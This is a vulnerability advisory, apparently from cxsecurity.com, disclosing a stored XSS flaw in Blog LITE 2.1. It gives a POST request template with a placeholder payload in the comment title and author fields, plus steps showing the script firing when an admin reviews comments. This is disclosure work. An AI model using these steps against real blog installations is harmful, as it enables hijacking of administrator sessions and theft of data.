Blog LITE 2.1 - Stored XSS

2023.06.19
lb CraCkEr (LB) lb
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Author : CraCkEr Website : https://www.netartmedia.net/blog-lite Vendor : NetArt Media Software : Blog LITE 2.1 Vuln Type: Stored XSS Impact : Manipulate the content of the site Release Notes: Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Stored XSS --------------------------------------------------------- POST /blog/index.php HTTP/2 -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="title" [XSS Payload] -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="content" -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="author" [XSS Payload] -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="email" -----------------------------401019026540470155022776857270 ## Steps to Reproduce: 1. Visit Any Category on the Blog 2. Write a comment (as Guest) 3. Inject your [XSS Payload] in "Comment Title" 4. Inject your [XSS Payload] in "Your Name" 5. Submit 6. By default the Blog Disable your comment for Admin Check 7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts) 8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2) 9. XSS Will Fire and Executed on his Browser [-] Done © CraCkEr 2023


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top